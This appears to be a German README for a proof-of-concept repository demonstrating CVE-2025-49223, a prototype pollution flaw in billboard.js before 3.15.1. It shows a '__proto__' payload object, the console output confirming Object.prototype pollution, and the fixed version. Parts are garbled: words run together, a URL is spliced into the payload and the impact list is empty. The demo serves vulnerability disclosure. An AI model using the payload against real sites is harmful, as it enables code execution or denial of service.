
CVE-2025-49223 - Prototype Pollution in Billboard.js
Es wurde festgestellt, dass billboard.js vor 3.15.1 eine Prototype Pollution über die Funktion
generateenthält, die es Angreifern ermöglichen könnte, beliebigen Code auszuführen oder einen Denial of Service (DoS) durch das Einschleusen beliebiger Eigenschaften zu verursachen.
Dieses Repository demonstriert eine Prototype-Pollution-Schwachstelle, die in billboard.js Versionen vor 3.15.1 gefunden wurde und als CVE-2025-49223 offengelegt wurde.
<= 3.14.0>= 3.15.1Öffnen Sie index.html in einem Browser und prüfen Sie die Konsolenausgabe auf Prototype-Pollution-Versuche.
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/billboard.pkgd.min.js"></script>
{
["__proto__"]: https://raw.githubusercontent.com/louay-075/cve-2025-49223-billboardjs-poc/HEAD/%7B
polluted: "polluted_via_string_key"
}
}
🔥 string key '__proto__' -> POLLUTED! Value: polluted_via_string_key
Dies bestätigt, dass ein Angreifer Object.prototype verschmutzen kann, was sich auf alle zukünftigen Objekte auswirkt, die auf der Seite erstellt werden.
Eine erfolgreiche Ausnutzung kann zu Folgendem führen:
billboard.js-Version 3.15.1 oder neuer⚠️ Haftungsausschluss: Dieser PoC dient nur zu Bildungs- und Forschungszwecken. Verwenden Sie ihn verantwortungsvoll.